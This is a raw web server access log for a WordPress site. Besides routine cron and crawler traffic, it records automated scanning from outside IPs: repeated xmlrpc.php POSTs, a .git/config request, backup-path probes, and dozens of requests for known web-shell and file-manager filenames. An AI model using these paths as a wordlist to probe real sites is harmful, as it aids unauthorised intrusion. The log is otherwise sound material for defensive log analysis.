162.0.217.136 - - [01/Apr/2025:15:14:25 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
45.154.98.17 - - [01/Apr/2025:15:30:36 -0400] "GET /wp-admin/css/ HTTP/1.1" 403 1242 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:15:38:54 -0400] "POST /wp-cron.php?doing_wp_cron=1743536334.6763370037078857421875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
199.188.207.168 - - [01/Apr/2025:15:38:51 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
13.68.31.143 - - [01/Apr/2025:15:45:20 -0400] "HEAD /wordpress HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.68.31.143 - - [01/Apr/2025:15:45:20 -0400] "HEAD /wordpress/ HTTP/1.1" 403 0 "http://bakingsecurityin.com/wordpress" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.68.31.143 - - [01/Apr/2025:15:45:21 -0400] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.68.31.143 - - [01/Apr/2025:15:45:21 -0400] "HEAD /wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.68.31.143 - - [01/Apr/2025:15:45:21 -0400] "HEAD /bc HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.68.31.143 - - [01/Apr/2025:15:45:21 -0400] "HEAD /bk HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.68.31.143 - - [01/Apr/2025:15:45:22 -0400] "HEAD /backup HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.68.31.143 - - [01/Apr/2025:15:45:22 -0400] "HEAD /old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.68.31.143 - - [01/Apr/2025:15:45:23 -0400] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.68.31.143 - - [01/Apr/2025:15:45:24 -0400] "HEAD /main HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.68.31.143 - - [01/Apr/2025:15:45:24 -0400] "HEAD /home HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:15:53:27 -0400] "POST /wp-cron.php?doing_wp_cron=1743537207.3931369781494140625000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
185.244.214.215 - - [01/Apr/2025:15:53:25 -0400] "GET /wp-content/plugins/royal-elementor-addons/readme.txt HTTP/1.1" 404 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1"
198.54.114.83 - - [01/Apr/2025:15:54:43 -0400] "POST /wp-cron.php?doing_wp_cron=1743537282.8152749538421630859375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
13.229.78.155 - - [01/Apr/2025:15:54:42 -0400] "GET /wp-cli.php HTTP/1.1" 404 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [01/Apr/2025:16:02:29 -0400] "POST /wp-cron.php?doing_wp_cron=1743537749.0356860160827636718750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
217.156.65.24 - - [01/Apr/2025:16:02:26 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203"
200.10.34.41 - - [01/Apr/2025:16:06:30 -0400] "GET /.git/config HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:16:25:27 -0400] "POST /wp-cron.php?doing_wp_cron=1743539127.1732709407806396484375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
216.244.65.154 - - [01/Apr/2025:16:25:23 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203"
13.229.78.155 - - [01/Apr/2025:16:48:46 -0400] "GET /wp-includes/ID3/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:48:47 -0400] "GET /wp-includes/ID3/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:48:49 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 200 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:48:50 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 302 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:48:51 -0400] "GET /wp-includes/IXR/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:48:52 -0400] "GET /wp-includes/IXR/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:48:54 -0400] "GET /wp-admin/images/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:48:54 -0400] "GET /wp-admin/images/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:48:55 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:48:56 -0400] "GET /wp-content/plugins/admin.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:48:57 -0400] "GET /xmlrpc.php HTTP/1.1" 405 60 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:48:58 -0400] "GET /wp-admin.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:48:59 -0400] "GET /wp-content/plugins/Core-Econ/upH.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:48:59 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:49:01 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:49:02 -0400] "GET /wp-content/plugins/shell/noimg.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:49:02 -0400] "GET /WSOEnigma.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:49:05 -0400] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:49:06 -0400] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:49:07 -0400] "GET /wp-content/plugins/clara/clara.php HTTP/1.1" 404 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [01/Apr/2025:16:50:17 -0400] "POST /wp-cron.php?doing_wp_cron=1743540616.9087049961090087890625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
173.212.223.204 - - [01/Apr/2025:16:50:16 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5"
198.54.114.83 - - [01/Apr/2025:16:54:38 -0400] "POST /wp-cron.php?doing_wp_cron=1743540878.4871900081634521484375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
172.177.66.139 - - [01/Apr/2025:16:54:36 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:39 -0400] "GET /wp-includes/Text/network.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:39 -0400] "GET /wp-content/upgrade-temp-backup/wp-login.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:39 -0400] "GET /js/fm.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:40 -0400] "GET /wp-content/themes/astra/inc/ki1k.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:40 -0400] "GET /WordPress/wp-admin/includes/zmFM.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:40 -0400] "GET /default.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:41 -0400] "GET /ty.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:41 -0400] "GET /wp-content/themes/cay-van-phong/filemanager.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:41 -0400] "GET /fm.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:42 -0400] "GET /wp-content/plugins/seoplugins/index.php HTTP/1.1" 301 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:42 -0400] "GET /wp-content/plugins/seoplugins/ HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:42 -0400] "GET /ini.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:43 -0400] "GET /libraries/legacy/info.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:43 -0400] "GET /wp-content/themes/include.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:44 -0400] "GET /wp-admin/network/about.php HTTP/1.1" 302 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:45 -0400] "GET /alfa.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:45 -0400] "GET /wp-mail.php/wp-includes/ID3/rk2.php HTTP/1.1" 403 1138 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:45 -0400] "GET /assets/images/28c5400b0b.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:46 -0400] "GET /wordpress/wp-includes/wp-config-sample.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:47 -0400] "GET /wp-mail.php/wp-includes/ID3/.info.php HTTP/1.1" 403 1138 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:47 -0400] "GET /wp-includes/Text/Diff/Engine/about.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:47 -0400] "GET /wp-includes/js/tinymce/skins/lightgray/img/about.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:48 -0400] "GET /wp-includes/block-supports/autoload_classmap.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:48 -0400] "GET /wp-content/uploads/classwithtostring.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:48 -0400] "GET /wp-admin/images/install.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:49 -0400] "GET /.well-known/link.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:49 -0400] "GET /wp-admin/chosen.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:50 -0400] "GET /info.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:50 -0400] "GET /wp-includes/assets/about.php HTTP/1.1" 404 0 "-" "-"
172.177.66.139 - - [01/Apr/2025:16:54:50 -0400] "GET /test.php HTTP/1.1" 404 0 "-" "-"
198.54.114.83 - - [01/Apr/2025:16:58:25 -0400] "POST /wp-cron.php?doing_wp_cron=1743541105.0806579589843750000000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
182.44.9.147 - - [01/Apr/2025:16:58:13 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
85.208.98.23 - - [01/Apr/2025:17:12:11 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
198.54.114.83 - - [01/Apr/2025:17:13:55 -0400] "POST /wp-cron.php?doing_wp_cron=1743542034.6540861129760742187500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
23.111.188.34 - - [01/Apr/2025:17:13:51 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36"
2a13:adc0::d267:26ff:fed2:b782 - - [01/Apr/2025:17:37:57 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
198.54.114.83 - - [01/Apr/2025:17:47:37 -0400] "POST /wp-cron.php?doing_wp_cron=1743544057.5181150436401367187500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
212.102.39.196 - - [01/Apr/2025:17:47:35 -0400] "GET /top-5-retinol-creams/ HTTP/1.1" 200 0 "http://bakingsecurityin.com/top-5-retinol-creams/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
212.102.39.196 - - [01/Apr/2025:17:47:38 -0400] "GET / HTTP/1.1" 200 0 "http://bakingsecurityin.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
198.54.114.83 - - [01/Apr/2025:18:02:09 -0400] "POST /wp-cron.php?doing_wp_cron=1743544929.1111199855804443359375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
103.227.176.18 - - [01/Apr/2025:18:02:06 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0"
198.54.114.83 - - [01/Apr/2025:18:26:29 -0400] "POST /wp-cron.php?doing_wp_cron=1743546388.6927869319915771484375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
198.54.114.98 - - [01/Apr/2025:18:26:22 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
198.54.114.83 - - [01/Apr/2025:18:28:10 -0400] "POST /wp-cron.php?doing_wp_cron=1743546490.6173119544982910156250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
164.92.80.194 - - [01/Apr/2025:18:28:07 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
198.54.114.83 - - [01/Apr/2025:18:50:41 -0400] "POST /wp-cron.php?doing_wp_cron=1743547841.0316550731658935546875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
103.7.8.179 - - [01/Apr/2025:18:50:38 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5"
198.54.114.83 - - [01/Apr/2025:18:52:10 -0400] "POST /wp-cron.php?doing_wp_cron=1743547930.2183899879455566406250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
20.198.224.111 - - [01/Apr/2025:18:52:08 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
198.54.114.83 - - [01/Apr/2025:19:14:49 -0400] "POST /wp-cron.php?doing_wp_cron=1743549288.9261429309844970703125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
162.0.232.248 - - [01/Apr/2025:19:14:46 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0"
198.54.114.83 - - [01/Apr/2025:19:17:43 -0400] "POST /wp-cron.php?doing_wp_cron=1743549462.7183470726013183593750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
171.244.0.91 - - [01/Apr/2025:19:17:39 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
198.54.114.83 - - [01/Apr/2025:19:39:12 -0400] "POST /wp-cron.php?doing_wp_cron=1743550751.3274970054626464843750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
104.43.93.163 - - [01/Apr/2025:19:39:06 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:19:45:37 -0400] "POST /wp-cron.php?doing_wp_cron=1743551137.2787289619445800781250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
103.205.211.78 - - [01/Apr/2025:19:45:35 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
198.54.114.83 - - [01/Apr/2025:20:03:42 -0400] "POST /wp-cron.php?doing_wp_cron=1743552221.9000620841979980468750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
8.210.103.127 - - [01/Apr/2025:20:03:39 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
182.43.230.63 - - [01/Apr/2025:20:17:18 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (X11; Gentoo; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
198.54.114.83 - - [01/Apr/2025:20:28:16 -0400] "POST /wp-cron.php?doing_wp_cron=1743553696.2785589694976806640625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
198.177.120.19 - - [01/Apr/2025:20:28:15 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0"
195.191.219.132 - - [01/Apr/2025:20:29:02 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.0; http://mj12bot.com/)"
198.54.114.83 - - [01/Apr/2025:20:29:03 -0400] "POST /wp-cron.php?doing_wp_cron=1743553743.0347509384155273437500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
195.191.219.132 - - [01/Apr/2025:20:29:02 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.0; http://mj12bot.com/)"
198.54.114.83 - - [01/Apr/2025:20:50:00 -0400] "POST /wp-cron.php?doing_wp_cron=1743554999.8312439918518066406250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
81.177.136.216 - - [01/Apr/2025:20:49:56 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
66.29.132.2 - - [01/Apr/2025:20:52:59 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:21:17:59 -0400] "POST /wp-cron.php?doing_wp_cron=1743556678.9818000793457031250000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
208.107.66.243 - - [01/Apr/2025:21:17:56 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:21:30:41 -0400] "POST /wp-cron.php?doing_wp_cron=1743557441.5743958950042724609375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
209.38.43.118 - - [01/Apr/2025:21:30:41 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible)"
2400:6180:100:d0::37a:2001 - - [01/Apr/2025:21:31:14 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
198.54.114.83 - - [01/Apr/2025:21:43:01 -0400] "POST /wp-cron.php?doing_wp_cron=1743558179.5670878887176513671875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
188.164.195.65 - - [01/Apr/2025:21:42:56 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://bakingsecurityin.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
198.54.114.83 - - [01/Apr/2025:21:44:26 -0400] "POST /wp-cron.php?doing_wp_cron=1743558264.6580829620361328125000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
49.51.233.46 - - [01/Apr/2025:21:44:21 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.83 - - [01/Apr/2025:21:57:09 -0400] "POST /wp-cron.php?doing_wp_cron=1743559029.1398339271545410156250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
110.172.98.2 - - [01/Apr/2025:21:57:07 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:22:06:45 -0400] "POST /wp-cron.php?doing_wp_cron=1743559605.2275879383087158203125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://bakingsecurityin.com"
